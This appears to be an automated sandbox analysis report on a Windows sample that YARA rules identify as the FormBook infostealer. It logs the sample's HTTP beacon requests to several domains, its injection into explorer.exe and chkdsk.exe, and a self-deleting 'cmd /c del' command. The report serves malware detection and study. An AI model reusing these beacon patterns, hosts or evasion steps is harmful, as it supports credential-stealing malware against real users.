                                                    Host: www.experiencedlawfirms.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:43.132538080 CET | 9881 | IN | HTTP/1.1 302 Moved Temporarily
                                                    Date: Fri, 28 Jan 2022 19:59:41 GMT
                                                    Connection: close
                                                    Content-Length: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    Cache-Control: private, no-cache, no-store, max-age=0
                                                    Expires: Mon, 01 Jan 1990 0:00:00 GMT
                                                    Location: https://www.dynadot.com/forsale/experiencedlawfirms.com?drefid=2071


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    1 | 192.168.2.3 | 49817 | 199.59.243.200 | 80 | C:\Windows\explorer.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Jan 28, 2022 20:59:48.188611984 CET | 9882 | OUT | GET /cbgo/?4hPx=1bX869aeBvRpB8efE68exBqREj8ZtAjUgPjKFGRzRfZzNr9ae7mwrEXk0/ZD8RpqTQtr&Xf3=7nL8 HTTP/1.1
                                                    Host: www.totalwinerewards.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jan 28, 2022 20:59:48.386589050 CET | 9883 | IN | HTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Set-Cookie: parking_session=915ee359-eb6f-27d3-758c-9b4148d69bcd; expires=Fri, 28-Jan-2022 20:14:48 GMT; Max-Age=900; path=/; HttpOnly
                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g==
                                                    Cache-Control: no-cache
                                                    Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                    Cache-Control: no-store, must-revalidate
                                                    Cache-Control: post-check=0, pre-check=0
                                                    Pragma: no-cache
                                                    Data Ascii: 589<!doctype html><html lang="en" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_YiK60Qco7iKrEoYb629f/pqFNNxNMwpqSwbmJjBGxbwL67qPTHjuiYjl+re72XQaOdlZyuLDY5NjvdcCv8Qk9g=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="preconnect" href="https://www.google.com" crossorigin><
                                                    Timestamp: Jan 28, 2022 20:59:48.386617899 CET
                                                    kBytes transferred: 9884
                                                    Direction: IN
                                                    Data Ascii: link rel="dns-prefetch" href="https://parking.bodiscdn.com" crossorigin><link rel="dns-prefetch" href="https://fonts.googleapis.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiOTE1ZWUz


                                                    Session ID: 2
                                                    Source IP: 192.168.2.3
                                                    Source Port: 49819
                                                    Destination IP: 34.102.136.180
                                                    Destination Port: 80
                                                    Process: C:\Windows\explorer.exe
                                                    Timestamp: Jan 28, 2022 20:59:53.439712048 CET
                                                    kBytes transferred: 9894
                                                    Direction: OUT
                                                    Data: GET /cbgo/?Xf3=7nL8&4hPx=EmDZCHQOcI1nLFjwZeeYVuMSiom2MDKGDS/zESQUEEY6NQpaRm0dZ/ZfJs3HzPw+5Ylf HTTP/1.1
                                                    Host: www.casatowerofficial.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Timestamp: Jan 28, 2022 20:59:53.555000067 CET
                                                    kBytes transferred: 9894
                                                    Direction: IN
                                                    Data: HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 19:59:53 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session ID: 3
                                                    Source IP: 192.168.2.3
                                                    Source Port: 49820
                                                    Destination IP: 18.231.72.25
                                                    Destination Port: 80
                                                    Process: C:\Windows\explorer.exe
                                                    Timestamp: Jan 28, 2022 20:59:59.099003077 CET
                                                    kBytes transferred: 9895
                                                    Direction: OUT
                                                    Data: GET /cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8 HTTP/1.1
                                                    Host: www.bitconga.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Timestamp: Jan 28, 2022 20:59:59.332036972 CET
                                                    kBytes transferred: 9896
                                                    Direction: IN
                                                    Data: HTTP/1.1 301 Moved Permanently
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Fri, 28 Jan 2022 19:59:59 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 178
                                                    Connection: close
                                                    Location: https://www.bitconga.com/cbgo/?4hPx=dYuxO3siHqLtebwjMrcX5kx68cWjYzK43o/BCbb09yTbLvpXET1fm3yQPY7Ys1RTSltw&Xf3=7nL8
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                    Session ID: 4
                                                    Source IP: 192.168.2.3
                                                    Source Port: 49821
                                                    Destination IP: 34.102.136.180
                                                    Destination Port: 80
                                                    Process: C:\Windows\explorer.exe
                                                    Timestamp: Jan 28, 2022 21:00:09.463599920 CET
                                                    kBytes transferred: 9897
                                                    Direction: OUT
                                                    Data: GET /cbgo/?4hPx=t6byCRjNUQvGMW438Oj8n0b0Tq5DbL5JR7oEbxqA77YwnlkkuyfhzykLt/IStXAvHe2n&Xf3=7nL8 HTTP/1.1
                                                    Host: www.omnipets.store
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Timestamp: Jan 28, 2022 21:00:09.578330040 CET
                                                    kBytes transferred: 9897
                                                    Direction: IN
                                                    Data: HTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Fri, 28 Jan 2022 20:00:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "61f22041-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>



                                                    Target ID:0
                                                    Start time:20:58:13
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0x590000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low

                                                    Target ID:3
                                                    Start time:20:58:34
                                                    Start date:28/01/2022
                                                    Path:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
                                                    Imagebase:0xd80000
                                                    File size:391680 bytes
                                                    MD5 hash:CF6D4FD3DC8E4751B7F89F857B618EF3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    Target ID:5
                                                    Start time:20:58:37
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff720ea0000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:high

                                                    Target ID:10
                                                    Start time:20:59:02
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\chkdsk.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                    Imagebase:0x90000
                                                    File size:23040 bytes
                                                    MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    Target ID:13
                                                    Start time:20:59:09
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
                                                    Imagebase:0xd80000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Target ID:14
                                                    Start time:20:59:11
                                                    Start date:28/01/2022
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7f20f0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                      Execution Graph

                                                      Execution Coverage:11.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:226
                                                      Total number of Limit Nodes:10
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0f752da08e56c1d48df8669cf1f78c020fa0472a0fb59068326af00ec39561a8
                                                      • Instruction ID: f24d0ff622b529f53cb55627081a4c10f4c55f07457b66684672041c319a9a0b
                                                      • Opcode Fuzzy Hash: 0f752da08e56c1d48df8669cf1f78c020fa0472a0fb59068326af00ec39561a8
                                                      • Instruction Fuzzy Hash: 7812D7F1C917468BE310CF65E8981993F61F745328BD2CB29DA612BAE0D7B4116ECF48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba5abb8149f4db6d8ee01d2a467dc20a8f97ef26800bfa77a0cf4f35714b5f25
                                                      • Instruction ID: 7a7e7f915178af257a3c17ec80b4c0235f921a4eb85e07f19d686d2367570ce0
                                                      • Opcode Fuzzy Hash: ba5abb8149f4db6d8ee01d2a467dc20a8f97ef26800bfa77a0cf4f35714b5f25
                                                      • Instruction Fuzzy Hash: BFC13AB1C917468BE310CF65E8881897F71FB85328F92CB29D9612B6E0D7B4146ECF48
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7167d1c-7167d22 2 7167d24-7167d26 0->2 3 7167d2a-7167d2d 0->3 4 7167d2e-7167dbd 2->4 5 7167d28-7167d29 2->5 3->4 7 7167df6-7167e16 4->7 8 7167dbf-7167dc9 4->8 5->3 13 7167e4f-7167e7e 7->13 14 7167e18-7167e22 7->14 8->7 9 7167dcb-7167dcd 8->9 11 7167df0-7167df3 9->11 12 7167dcf-7167dd9 9->12 11->7 15 7167ddd-7167dec 12->15 16 7167ddb 12->16 24 7167eb7-7167f71 CreateProcessA 13->24 25 7167e80-7167e8a 13->25 14->13 17 7167e24-7167e26 14->17 15->15 18 7167dee 15->18 16->15 19 7167e28-7167e32 17->19 20 7167e49-7167e4c 17->20 18->11 22 7167e36-7167e45 19->22 23 7167e34 19->23 20->13 22->22 26 7167e47 22->26 23->22 36 7167f73-7167f79 24->36 37 7167f7a-7168000 24->37 25->24 27 7167e8c-7167e8e 25->27 26->20 28 7167e90-7167e9a 27->28 29 7167eb1-7167eb4 27->29 31 7167e9e-7167ead 28->31 32 7167e9c 28->32 29->24 31->31 33 7167eaf 31->33 32->31 33->29 36->37 47 7168002-7168006 37->47 48 7168010-7168014 37->48 47->48 49 7168008 47->49 50 7168016-716801a 48->50 51 7168024-7168028 48->51 49->48 50->51 52 716801c 50->52 53 716802a-716802e 51->53 54 7168038-716803c 51->54 52->51 53->54 55 7168030 53->55 56 716804e-7168055 54->56 57 716803e-7168044 54->57 55->54 58 7168057-7168066 56->58 59 716806c 56->59 57->56 58->59 61 716806d 59->61 61->61
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07167F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 9e3feb74a27da7f61841ada3d6c51edefcd350d9726bfdc077dc23b7b6ca443f
                                                      • Instruction ID: 48e7759cbee78a9976a634189e6d692c912495a511557d45179980627e965700
                                                      • Opcode Fuzzy Hash: 9e3feb74a27da7f61841ada3d6c51edefcd350d9726bfdc077dc23b7b6ca443f
                                                      • Instruction Fuzzy Hash: B6A16CB1D00219CFDB15CFA8C984BEEBBB2BF48318F148569D819B7280DB749995CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 62 7167d28-7167dbd 66 7167df6-7167e16 62->66 67 7167dbf-7167dc9 62->67 72 7167e4f-7167e7e 66->72 73 7167e18-7167e22 66->73 67->66 68 7167dcb-7167dcd 67->68 70 7167df0-7167df3 68->70 71 7167dcf-7167dd9 68->71 70->66 74 7167ddd-7167dec 71->74 75 7167ddb 71->75 83 7167eb7-7167f71 CreateProcessA 72->83 84 7167e80-7167e8a 72->84 73->72 76 7167e24-7167e26 73->76 74->74 77 7167dee 74->77 75->74 78 7167e28-7167e32 76->78 79 7167e49-7167e4c 76->79 77->70 81 7167e36-7167e45 78->81 82 7167e34 78->82 79->72 81->81 85 7167e47 81->85 82->81 95 7167f73-7167f79 83->95 96 7167f7a-7168000 83->96 84->83 86 7167e8c-7167e8e 84->86 85->79 87 7167e90-7167e9a 86->87 88 7167eb1-7167eb4 86->88 90 7167e9e-7167ead 87->90 91 7167e9c 87->91 88->83 90->90 92 7167eaf 90->92 91->90 92->88 95->96 106 7168002-7168006 96->106 107 7168010-7168014 96->107 106->107 108 7168008 106->108 109 7168016-716801a 107->109 110 7168024-7168028 107->110 108->107 109->110 111 716801c 109->111 112 716802a-716802e 110->112 113 7168038-716803c 110->113 111->110 112->113 114 7168030 112->114 115 716804e-7168055 113->115 116 716803e-7168044 113->116 114->113 117 7168057-7168066 115->117 118 716806c 115->118 116->115 117->118 120 716806d 118->120 120->120
                                                      APIs
                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07167F5E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.349557692.0000000007160000.00000040.00000800.00020000.00000000.sdmp, Offset: 07160000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7160000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: a042bc415e10ea4524ce21cc54352fa805ebea85e0fe25f2b249a86194f7058b
                                                      • Instruction ID: 04365f2f97eedb9b1bb4645c94174750167ff629433c0c134ebac24213f8cf5e
                                                      • Opcode Fuzzy Hash: a042bc415e10ea4524ce21cc54352fa805ebea85e0fe25f2b249a86194f7058b
                                                      • Instruction Fuzzy Hash: F4916CB1D00219CFDB15CFA8C984BEEBBB2BF44318F148569D819B7280DB749995CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 121 27597f0-2759805 call 2758244 124 2759807 121->124 125 275981b-275981f 121->125 174 275980d call 2759a78 124->174 175 275980d call 2759a6b 124->175 126 2759821-275982b 125->126 127 2759833-2759874 125->127 126->127 132 2759876-275987e 127->132 133 2759881-275988f 127->133 128 2759813-2759815 128->125 129 2759950-2759a10 128->129 169 2759a12-2759a15 129->169 170 2759a18-2759a43 GetModuleHandleW 129->170 132->133 135 2759891-2759896 133->135 136 27598b3-27598b5 133->136 138 27598a1 135->138 139 2759898-275989f call 2758250 135->139 137 27598b8-27598bf 136->137 141 27598c1-27598c9 137->141 142 27598cc-27598d3 137->142 140 27598a3-27598b1 138->140 139->140 140->137 141->142 145 27598d5-27598dd 142->145 146 27598e0-27598e9 call 2758260 142->146 145->146 151 27598f6-27598fb 146->151 152 27598eb-27598f3 146->152 154 27598fd-2759904 151->154 155 2759919-275991d 151->155 152->151 154->155 157 2759906-2759916 call 27593dc call 27593ec 154->157 176 2759920 call 2759d80 155->176 177 2759920 call 2759d7b 155->177 157->155 158 2759923-2759926 161 2759949-275994f 158->161 162 2759928-2759946 158->162 162->161 169->170 171 2759a45-2759a4b 170->171 172 2759a4c-2759a60 170->172 171->172 174->128 175->128 176->158 177->158
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02759A36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 124da0b3b197d69ec1acaf2f5fb669a153ff03410dce115c52cc6bfe0a95f574
                                                      • Instruction ID: d757c21eb429ed456904e245b45aa41c587279bbe50e2cff7c17bff2c5e8bf36
                                                      • Opcode Fuzzy Hash: 124da0b3b197d69ec1acaf2f5fb669a153ff03410dce115c52cc6bfe0a95f574
                                                      • Instruction Fuzzy Hash: 5F711370A00B15CFDB24DF6AD15579ABBF5BF88304F008A2AD94AD7A50DB78E805CF91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 195 27553f5-27553f6 196 27553f8-27553f9 195->196 197 27553fa 195->197 196->197 198 27553fc 197->198 199 27553fe-27554c1 CreateActCtxA 197->199 198->199 201 27554c3-27554c9 199->201 202 27554ca-2755524 199->202 201->202 209 2755526-2755529 202->209 210 2755533-2755537 202->210 209->210 211 2755539-2755545 210->211 212 2755548 210->212 211->212 214 2755549 212->214 214->214
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3de2c9b2691367efb8933fe62855bb30e8eb90242afc444df4838f09ef0687e2
                                                      • Instruction ID: 6aa3b30acefe9177acfd2953ebd366f58319c4f0497cc8201d1e350b0914c9bd
                                                      • Opcode Fuzzy Hash: 3de2c9b2691367efb8933fe62855bb30e8eb90242afc444df4838f09ef0687e2
                                                      • Instruction Fuzzy Hash: 3741F370D00629CFDB14CFA9C9447CDFBB6BF49308F208569D419AB251DBB5A946CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 2753cc0-27554c1 CreateActCtxA 181 27554c3-27554c9 178->181 182 27554ca-2755524 178->182 181->182 189 2755526-2755529 182->189 190 2755533-2755537 182->190 189->190 191 2755539-2755545 190->191 192 2755548 190->192 191->192 194 2755549 192->194 194->194
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 027554B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.345668592.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2750000_GV8EJooYMIgEnEk.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 5acccd85d77bbab6bbd1cccf8f7886d962259cb2d7f79cf8b5c6f1e91675d222
                                                      • Instruction ID: 7566b8926e817d0c4542daa3d247084c94086f1e9e8d097a3c926d18a50b010a
                                                      • Opcode Fuzzy Hash: 5acccd85d77bbab6bbd1cccf8f7886d962259cb2d7f79cf8b5c6f1e91675d222
                                                      • Instruction Fuzzy Hash: CA41D070C00628CBDB24CFA9C944BDEBBB6BF49308F608569D419BB251DBB5A945CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
